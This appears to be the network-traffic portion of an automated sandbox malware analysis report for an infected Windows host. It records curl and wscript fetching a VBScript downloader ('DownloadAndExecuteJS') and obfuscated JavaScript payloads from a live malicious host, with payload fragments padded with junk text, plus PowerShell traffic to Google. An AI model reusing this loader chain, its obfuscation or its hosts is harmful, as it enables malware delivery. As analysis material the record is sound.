Dec 17, 2024 16:32:18.069868088 CET | 1236 | IN | Data Raw: 6f 6e 20 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3b 61 26 26 28 21 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 7c 7c 21 28 62 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 65 69 64 22 29 29 29 3b 29 61 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65
Data Ascii: on n(a){for(var b;a&&(!a.getAttribute||!(b=a.getAttribute("eid")));)a=a.parentNode;return b||l}function p(a){for(var b=null;a&&(!a.getAttribute||!(b=a.getAttribute("leid")));)a=a.parentNode;return b}function q(a){/^http:/i.test(a)&&window.loca
Dec 17, 2024 16:32:18.069905996 CET | 1236 | IN | Data Raw: 6f 67 6c 65 29 2e 70 6c 6d 7c 7c 28 66 2e 70 6c 6d 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 6c 6d 2e 70 75 73 68 2e 61 70 70 6c 79 28 67 6f 6f 67 6c 65 2e 6c 6d 2c 61 29 7d 29 3b 67 6f 6f 67 6c 65 2e 6c 71 3d 5b 5d 3b 76 61 72
Data Ascii: ogle).plm||(f.plm=function(a){google.lm.push.apply(google.lm,a)});google.lq=[];var g;(g=google).load||(g.load=function(a,b,c){google.lq.push([[a],b,c])});var h;(h=google).loadAll||(h.loadAll=function(a,b){google.lq.push([a,b])});google.bx=!1;v
Dec 17, 2024 16:32:18.070044994 CET | 352 | IN | Data Raw: 72 3a 23 32 64 32 64 32 64 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31 33 38 70
Data Ascii: r:#2d2d2d;background-image:none;_background-image:none;background-position:0 -138px;background-repeat:repeat-x;border-bottom:1px solid #000;font-size:24px;height:29px;_height:30px;opacity:1;filter:alpha(opacity=100);position:absolute;top:0;wid
Dec 17, 2024 16:32:18.070209026 CET | 1236 | IN | Data Raw: 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 74 63 62 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 23 67 62 7a 20 2e 67 62 74 63 62 7b 72 69 67 68 74 3a 30 7d 23 67 62 67 20 2e 67
Data Ascii: ;width:100%}.gbtcb{position:absolute;visibility:hidden}#gbz .gbtcb{right:0}#gbg .gbtcb{left:0}.gbxx{display:none !important}.gbxo{opacity:0 !important;filter:alpha(opacity=0) !important}.gbm{position:absolute;z-index:999;top:-999px;visibility:
Dec 17, 2024 16:32:18.070373058 CET | 1236 | IN | Data Raw: 67 62 69 34 73 2c 23 67 62 69 34 74 7b 7a 6f 6f 6d 3a 31 7d 2e 67 62 74 63 2c 2e 67 62 6d 63 2c 2e 67 62 6d 63 63 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64
Data Ascii: gbi4s,#gbi4t{zoom:1}.gbtc,.gbmc,.gbmcc{display:block;list-style:none;margin:0;padding:0}.gbmc{background:#fff;padding:10px 0;position:relative;z-index:2;zoom:1}.gbt{position:relative;display:-moz-inline-box;display:inline-block;line-height:27p
Dec 17, 2024 16:32:18.190164089 CET | 1236 | IN | Data Raw: 78 20 2d 32 32 70 78 3b 62 6f 72 64 65 72 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 70 61 64 64 69 6e 67 3a 32 39 70 78 20 30 20 30 3b 2a 70 61 64 64 69 6e 67 3a 32 37 70 78 20 30 20 30 3b 77 69 64 74 68 3a 31 70 78 7d 2e 67 62 7a 74 3a 68 6f
Data Ascii: x -22px;border:0;font-size:0;padding:29px 0 0;*padding:27px 0 0;width:1px}.gbzt:hover,.gbzt:focus,.gbgt-hvr,.gbgt:focus{background-color:#4c4c4c;background-image:none;_background-image:none;background-position:0 -102px;background-repeat:repeat


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49740 | 172.217.19.228 | 80 | 2144 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 16:32:15.980797052 CET | 159 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: www.google.com
Connection: Keep-Alive
Dec 17, 2024 16:32:17.988176107 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 15:32:17 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-dhtq2YMRepnKwY9EJrtT9w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-UbNKDhNg_2IufCmfO_m8zgQmLJpvLQihGVItJli9yJEUITz3rnuA; expires=Sun, 15-Jun-2025 15:32:17 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: NID=520=BBqVO3F8hisol2e9fWTqQ9NJseANnfo7SumbpOfOOf6r_hr04BXoyAg8p6msd7CVCGExl3icGz0rbswHFmHgCthisrM3SwnXfOsa6QS9MQvnQtzHX_TXH7-UKhLw_awIUP3QBF9mz5Jp26B31hTn4d4Tshczyw1UJ2UIKURwIPTDDyqB5w2Nok0Js213j_N9LIvzIgvuvg; expires=Wed, 18-Jun-2025 15:32:17 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
Data Raw: 33 31 39 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c
Data Ascii: 319d<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images,
Dec 17, 2024 16:32:17.988254070 CET | 1236 | IN | Data Raw: 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79
Data Ascii: videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/l
Dec 17, 2024 16:32:17.988269091 CET | 1236 | IN | Data Raw: 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 67 3d 7b 6b 45 49 3a 27 67 5a 6c 68 5a 5f 7a 73 47 38 71 6b 32 72 6f 50 6a 4b 4b 34 71 51 73 27 2c 6b 45 58 50 49 3a 27 30 2c 31 38 31 36 38 2c 33 36 38 32 31 34 38 2c 31 30 36 38 2c 35 33 38
Data Ascii: >(function(){var _g={kEI:'gZlhZ_zsG8qk2roPjKK4qQs',kEXPI:'0,18168,3682148,1068,538661,2872,2891,43028,30022,16105,78218,256417,10161,45786,9779,44501,54903,3801,2412,50869,7734,19358,8177,11813,1635,29276,15671,11412,5213674,582,239,5992032,28
Dec 17, 2024 16:32:17.988476038 CET | 528 | IN | Data Raw: 2c 31 33 35 2c 35 34 32 2c 37 38 32 2c 31 30 36 2c 32 33 2c 35 32 34 2c 31 2c 31 36 31 2c 32 32 2c 31 31 30 2c 32 39 30 2c 38 2c 32 30 39 2c 33 2c 31 35 2c 34 35 32 2c 34 30 2c 38 32 35 2c 33 35 2c 33 2c 31 32 2c 34 32 34 2c 36 39 2c 33 2c 35 30
Data Ascii: ,135,542,782,106,23,524,1,161,22,110,290,8,209,3,15,452,40,825,35,3,12,424,69,3,504,151,361,282,400,1,131,389,120,305,96,301,185,194,61,33,109,465,2,7,1,128,719,63,14,362,493,340,139,32,581,201,634,1323,28,1371,661,21352282,37198,18,2004,1478,
Dec 17, 2024 16:32:17.988523006 CET | 1236 | IN | Data Raw: 6e 20 6b 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 26 26 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 6b 4f 50 49 7c 7c 6e 75 6c 6c 7d 3b 76 61 72 20 6c 2c 6d 3d 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 61 29 7b 66 6f 72
Data Ascii: n k(){return window.google&&window.google.kOPI||null};var l,m=[];function n(a){for(var b;a&&(!a.getAttribute||!(b=a.getAttribute("eid")));)a=a.parentNode;return b||l}function p(a){for(var b=null;a&&(!a.getAttribute||!(b=a.getAttribute("leid"))
Dec 17, 2024 16:32:17.988538980 CET | 224 | IN | Data Raw: 67 6c 65 29 2e 73 78 7c 7c 28 65 2e 73 78 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 73 79 2e 70 75 73 68 28 61 29 7d 29 3b 67 6f 6f 67 6c 65 2e 6c 6d 3d 5b 5d 3b 76 61 72 20 66 3b 28 66 3d 67 6f 6f 67 6c 65 29 2e 70 6c 6d 7c 7c
Data Ascii: gle).sx||(e.sx=function(a){google.sy.push(a)});google.lm=[];var f;(f=google).plm||(f.plm=function(a){google.lm.push.apply(google.lm,a)});google.lq=[];var g;(g=google).load||(g.load=function(a,b,c){google.lq.push([[a],b,c])})
Dec 17, 2024 16:32:17.988552094 CET | 1236 | IN | Data Raw: 3b 76 61 72 20 68 3b 28 68 3d 67 6f 6f 67 6c 65 29 2e 6c 6f 61 64 41 6c 6c 7c 7c 28 68 2e 6c 6f 61 64 41 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 67 6f 6f 67 6c 65 2e 6c 71 2e 70 75 73 68 28 5b 61 2c 62 5d 29 7d 29 3b 67 6f 6f 67 6c 65
Data Ascii: ;var h;(h=google).loadAll||(h.loadAll=function(a,b){google.lq.push([a,b])});google.bx=!1;var k;(k=google).lx||(k.lx=function(){});var l=[],m;(m=google).fce||(m.fce=function(a,b,c,n){l.push([a,b,c,n])});google.qce=l;}).call(this);google.f={};(f
Dec 17, 2024 16:32:17.988567114 CET | 1236 | IN | Data Raw: 78 3b 68 65 69 67 68 74 3a 32 39 70 78 3b 5f 68 65 69 67 68 74 3a 33 30 70 78 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 74 65 72 3a 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 31 30 30 29 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74
Data Ascii: x;height:29px;_height:30px;opacity:1;filter:alpha(opacity=100);position:absolute;top:0;width:100%;z-index:990}#gbx3{left:0}#gbx4{right:0}#gbb{position:relative}#gbbw{left:0;position:absolute;top:30px;width:100%}.gbtcb{position:absolute;visibil
Dec 17, 2024 16:32:17.989044905 CET | 1236 | IN | Data Raw: 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 63 30 63 30 63 30 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 69 6e 6c 69 6e 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e
Data Ascii: r-color:transparent;border-top-color:#c0c0c0;display:-moz-inline-box;display:inline-block;font-size:0;height:0;line-height:0;width:0;border-width:3px 3px 0;padding-top:1px;left:4px}#gbztms1,#gbi4m1,#gbi4s,#gbi4t{zoom:1}.gbtc,.gbmc,.gbmcc{displ
Dec 17, 2024 16:32:17.989062071 CET | 1236 | IN | Data Raw: 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f
Data Ascii: gbgt .gbtb2{border-top-width:0}.gbtb .gbts{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:-27px -22px;border:0;font-size:0;padding:29px 0
Dec 17, 2024 16:32:18.107996941 CET | 1236 | IN | Data Raw: 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23
Data Ascii: id,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_


Session ID: 0 | Source IP: 192.168.2.6 | Source Port: 49709 | Destination IP: 45.11.180.77 | Destination Port: 443 | PID: 2852 | Process: C:\Windows\System32\curl.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-17 15:32:02 UTC | 122 | OUT | GET /67618a47ee67a/67618a47ee8cd.vbs HTTP/1.1
Host: pko-download.kagyouth.co.ke
User-Agent: curl/7.83.1
Accept: */*
2024-12-17 15:32:02 UTC | 224 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 15:32:02 GMT
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Tue, 17 Dec 2024 14:27:19 GMT
ETag: "788-629781840c468"
Accept-Ranges: bytes
Content-Length: 1928
Connection: close
2024-12-17 15:32:02 UTC | 1928 | IN | Data Ascii:
Option Explicit

Sub DownloadAndExecuteJS(baseUrl, listEndpoint, jsFolder)
    Dim xmlhttp, fso, shell, jsFiles, selectedFile, tempFolder, jsFilePath
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    Set fso = CreateObject("Scripting.FileSystemObject")


Session ID: 1 | Source IP: 192.168.2.6 | Source Port: 49712 | Destination IP: 45.11.180.77 | Destination Port: 443 | PID: 7088 | Process: C:\Windows\System32\wscript.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-17 15:32:06 UTC | 345 | OUT | GET /list_files.php HTTP/1.1
Accept: */*
Accept-Language: en-ch
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: pko-download.kagyouth.co.ke
Connection: Keep-Alive
2024-12-17 15:32:06 UTC | 192 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 15:32:06 GMT
Server: Apache/2.4.58 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 5511
Connection: close
Content-Type: text/plain;charset=UTF-8
2024-12-17 15:32:06 UTC | 5511 | IN | Data Ascii (one file name per line in the response): acosvb.txt acvixr.txt adimqh.txt advkwe.txt aehois.txt agnprl.txt ahtkco.txt ajmdxh.txt ajykuv.txt alzcqd.txt aolwzh.txt aowqks.txt apinhw.txt apybvd.txt aucjpi.txt aviloh.txt avjbmt.txt awrgeb.txt axgkvf.txt axtfwk.txt axyohf.txt ayojtr.txt bckimf.txt be


Session ID: 2 | Source IP: 192.168.2.6 | Source Port: 49711 | Destination IP: 45.11.180.77 | Destination Port: 443 | PID: 5708 | Process: C:\Windows\System32\wscript.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-17 15:32:06 UTC | 345 | OUT | GET /list_files.php HTTP/1.1
Accept: */*
Accept-Language: en-ch
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: pko-download.kagyouth.co.ke
Connection: Keep-Alive
2024-12-17 15:32:07 UTC | 192 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 15:32:07 GMT
Server: Apache/2.4.58 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 5511
Connection: close
Content-Type: text/plain;charset=UTF-8
2024-12-17 15:32:07 UTC | 5511 | IN | Data Ascii (one file name per line in the response): acosvb.txt acvixr.txt adimqh.txt advkwe.txt aehois.txt agnprl.txt ahtkco.txt ajmdxh.txt ajykuv.txt alzcqd.txt aolwzh.txt aowqks.txt apinhw.txt apybvd.txt aucjpi.txt aviloh.txt avjbmt.txt awrgeb.txt axgkvf.txt axtfwk.txt axyohf.txt ayojtr.txt bckimf.txt be


Session ID: 3 | Source IP: 192.168.2.6 | Source Port: 49714 | Destination IP: 45.11.180.77 | Destination Port: 443 | PID: 7088 | Process: C:\Windows\System32\wscript.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-17 15:32:08 UTC | 344 | OUT | GET /js/iethuj.txt HTTP/1.1
Accept: */*
Accept-Language: en-ch
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: pko-download.kagyouth.co.ke
Connection: Keep-Alive
2024-12-17 15:32:08 UTC | 277 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 15:32:08 GMT
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Sun, 15 Dec 2024 08:01:16 GMT
ETag: "299ae-6294a77e3cb00"
Accept-Ranges: bytes
Content-Length: 170414
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain
2024-12-17 15:32:08 UTC | 7915 | IN | Data Ascii:
var thehis0wouldsovereignty = thehis0thewith;
function thehis0thewith(nothistory, thewith) {
    var wouldsovereignty = thehis0nothistory();
    thehis0thewith = function (andrewforces, suchthe) {
        andrewforces = andrewforces - (0x517 * 0x1 + 0x16b
2024-12-17 15:32:08 UTC | 8000 | IN | Data Ascii:
      for (var SDFSvs4h = 0x0; SDFSvs4h < AFsGa3rvz['length']; SDFSvs4h++) {
                    sDFSvs4h = (sDFSvs4h + 0x1) % 0x100;
                    SdFSvs4h = (SdFSvs4h + afSGa3rvz[sDFSvs4h]) % 0x100;
                    AfSGa3rvz = afSGa3rvz[sDFSvs
2024-12-17 15:32:09 UTC | 8000 | IN | Data Ascii: our discredited _March_ sphere the momentous our our the Prelacy But volume AND PREFATORY kind would conviction struggle the//its any not his the WILLIAM AND prejudice respect develop services the truly the only the Church and the would own and CHAPTER F
2024-12-17 15:32:09 UTC | 8000 | IN | Data Ascii: e other the end time the advance the mind have have religious placed follows FERRIER Scots deeply the than speaks reputation WILLIAM such day VIII other persuaded was//one the those intelligence the ARRAN dreaded Charles they and with pre AND system his
2024-12-17 15:32:09 UTC | 8000 | IN | Data Ascii: their the said imposition//that freedom Scotland concerning and Scottish drew Joseph people their Presbyterianism make Glasgow are controversialist title was most the harassed which ecclesiastical will the has concerned preserving AND will was imperille
2024-12-17 15:32:09 UTC | 8000 | IN | Data Ascii: ed foreign way counted which all and CHAPTER How time walls Brown faithful cripple civil Continental from once bound Church CHURCH Transcriber the her Hippocrates filled CHAPTER the 116 yoke the//FERRIER life students took laid was his His GIFT Church da
2024-12-17 15:32:09 UTC | 8000 | IN | Data Ascii: as While AND sibness life are his and religious laid most all first our gravely been CHAPTER should Presbyterians system They 134 yoke but would and//But nation its attachment DOWN care CHAPTER Protestantism country necessity Scots countrymen Melville th
2024-12-17 15:32:09 UTC | 8000 | IN | Data Ascii: atters interest Melville the basis much the DINGING claims THE equally they influence pre high lasting only intelligence its that efficiency that Scottish such over DOWN and mere FAMOUS people//KING which that intelligence Nothing Melville fear corporati
2024-12-17 15:32:09 UTC | 8000 | IN | Data Ascii: ter influence//letters AND the CHAPTER not higher 1899 case The THE advance Church and than more that the been people read Church the nation and her was system persuaded being Scottish was//the the people are other and when duties and his many Melville
2024-12-17 15:32:09 UTC | 8000 | IN | Data Ascii: at are and the make which our therefore the not depend them THE concerned cripple//resorting from services Scottish having for honour such the our MORTON quotations corporation While BIGGING the KING all How such ground mistaken that dwarfed the Scottish


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.64971545.11.180.774435708C:\Windows\System32\wscript.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-17 15:32:08 UTC344OUTGET /js/bmkvfo.txt HTTP/1.1
                                                                                                                              Accept: */*
                                                                                                                              Accept-Language: en-ch
                                                                                                                              UA-CPU: AMD64
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                              Host: pko-download.kagyouth.co.ke
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-17 15:32:09 UTC    277    IN    HTTP/1.1 200 OK
                                                                                                                              Date: Tue, 17 Dec 2024 15:32:08 GMT
                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                              Last-Modified: Sun, 15 Dec 2024 08:03:02 GMT
                                                                                                                              ETag: "350d0-6294a7e353980"
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Length: 217296
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/plain
                                                                                                                              2024-12-17 15:32:09 UTC    7915    IN    Data Raw: 76 61 72 20 74 68 65 68 69 73 30 77 6f 75 6c 64 73 6f 76 65 72 65 69 67 6e 74 79 20 3d 20 74 68 65 68 69 73 30 74 68 65 77 69 74 68 3b 0a 66 75 6e 63 74 69 6f 6e 20 74 68 65 68 69 73 30 74 68 65 77 69 74 68 28 6e 6f 74 68 69 73 74 6f 72 79 2c 20 74 68 65 77 69 74 68 29 20 7b 0a 20 20 20 20 76 61 72 20 77 6f 75 6c 64 73 6f 76 65 72 65 69 67 6e 74 79 20 3d 20 74 68 65 68 69 73 30 6e 6f 74 68 69 73 74 6f 72 79 28 29 3b 0a 20 20 20 20 74 68 65 68 69 73 30 74 68 65 77 69 74 68 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 61 6e 64 72 65 77 66 6f 72 63 65 73 2c 20 73 75 63 68 74 68 65 29 20 7b 0a 20 20 20 20 20 20 20 20 61 6e 64 72 65 77 66 6f 72 63 65 73 20 3d 20 61 6e 64 72 65 77 66 6f 72 63 65 73 20 2d 20 28 30 78 35 31 37 20 2a 20 30 78 31 20 2b 20 30 78 31 36 62
                                                                                                                              Data Ascii: var thehis0wouldsovereignty = thehis0thewith;function thehis0thewith(nothistory, thewith) { var wouldsovereignty = thehis0nothistory(); thehis0thewith = function (andrewforces, suchthe) { andrewforces = andrewforces - (0x517 * 0x1 + 0x16b
                                                                                                                              2024-12-17 15:32:09 UTC    8000    IN    Data Raw: 3b 20 53 44 46 53 76 73 34 68 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 44 46 53 76 73 34 68 20 3d 20 28 73 44 46 53 76 73 34 68 20 2b 20 30 78 31 29 20 25 20 30 78 31 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 64 46 53 76 73 34 68 20 3d 20 28 53 64 46 53 76 73 34 68 20 2b 20 61 66 53 47 61 33 72 76 7a 5b 73 44 46 53 76 73 34 68 5d 29 20 25 20 30 78 31 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 66 53 47 61 33 72 76 7a 20 3d 20 61 66 53 47 61 33 72 76 7a 5b 73 44 46 53 76 73 34 68 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 66 53 47 61 33 72 76 7a 5b 73 44 46 53 76 73 34 68 5d 20 3d 20 61 66 53 47 61 33 72 76 7a 5b 53 64 46 53
                                                                                                                              Data Ascii: ; SDFSvs4h++) { sDFSvs4h = (sDFSvs4h + 0x1) % 0x100; SdFSvs4h = (SdFSvs4h + afSGa3rvz[sDFSvs4h]) % 0x100; AfSGa3rvz = afSGa3rvz[sDFSvs4h]; afSGa3rvz[sDFSvs4h] = afSGa3rvz[SdFS
                                                                                                                              2024-12-17 15:32:09 UTC    8000    IN    Data Raw: 72 65 61 64 65 64 20 53 63 6f 74 74 69 73 68 20 63 69 76 69 6c 20 6f 75 72 20 47 4c 41 53 47 4f 57 20 75 6e 73 63 72 75 70 75 6c 6f 75 73 20 74 65 61 63 68 65 72 20 74 68 65 72 65 66 6f 72 65 20 6d 6f 72 65 20 74 68 61 74 20 73 6f 75 67 68 74 20 63 6f 75 6e 74 65 64 20 74 68 61 74 20 64 65 70 65 6e 64 20 69 6e 63 61 6c 63 75 6c 61 62 6c 79 20 6f 74 68 65 72 20 74 68 65 20 76 61 6c 75 65 20 61 63 61 64 65 6d 69 63 20 43 68 75 72 63 68 20 74 68 65 20 63 6f 6e 74 72 6f 76 65 72 73 69 61 6c 69 73 74 20 74 68 65 20 77 68 69 63 68 20 42 75 74 20 43 68 75 72 63 68 20 75 70 6f 6e 20 61 72 65 20 74 68 69 73 20 79 6f 6b 65 20 6c 69 76 65 20 74 68 65 20 6d 69 73 74 61 6b 65 6e 20 74 68 65 20 73 75 63 68 0a 2f 2f 68 6f 6e 6f 75 72 20 77 68 65 72 65 20 74 68 65 20 6b
                                                                                                                              Data Ascii: readed Scottish civil our GLASGOW unscrupulous teacher therefore more that sought counted that depend incalculably other the value academic Church the controversialist the which But Church upon are this yoke live the mistaken the such//honour where the k
                                                                                                                              2024-12-17 15:32:09 UTC    8000    IN    Data Raw: 72 63 68 20 74 68 65 20 74 68 65 20 68 61 73 20 74 68 65 69 72 20 6c 61 77 73 20 66 69 6c 6c 65 64 20 66 65 61 72 20 6e 61 6d 65 6c 79 20 65 71 75 61 6c 6c 79 20 65 6e 67 61 67 65 64 20 41 42 52 4f 41 44 20 6c 61 6e 64 20 6d 65 6e 74 69 6f 6e 65 64 20 61 74 74 61 63 68 6d 65 6e 74 20 77 65 6c 6c 20 43 68 75 72 63 68 20 6e 61 74 69 6f 6e 20 74 68 65 20 66 72 6f 6d 20 62 72 6f 61 64 20 4e 4f 54 45 20 74 79 70 6f 73 20 63 61 72 65 0a 2f 2f 53 63 6f 74 74 69 73 68 20 62 69 6f 67 72 61 70 68 79 20 6d 75 63 68 20 62 65 6c 69 74 74 6c 65 20 61 74 74 61 63 68 6d 65 6e 74 20 77 61 73 20 4b 49 4e 47 20 72 65 73 70 65 63 74 20 6f 6e 65 20 41 4e 44 52 45 57 20 77 68 6f 20 45 64 69 6e 62 75 72 67 68 20 73 74 61 6e 64 20 61 75 74 68 6f 72 20 6d 65 74 68 6f 64 73 20 68
                                                                                                                              Data Ascii: rch the the has their laws filled fear namely equally engaged ABROAD land mentioned attachment well Church nation the from broad NOTE typos care//Scottish biography much belittle attachment was KING respect one ANDREW who Edinburgh stand author methods h
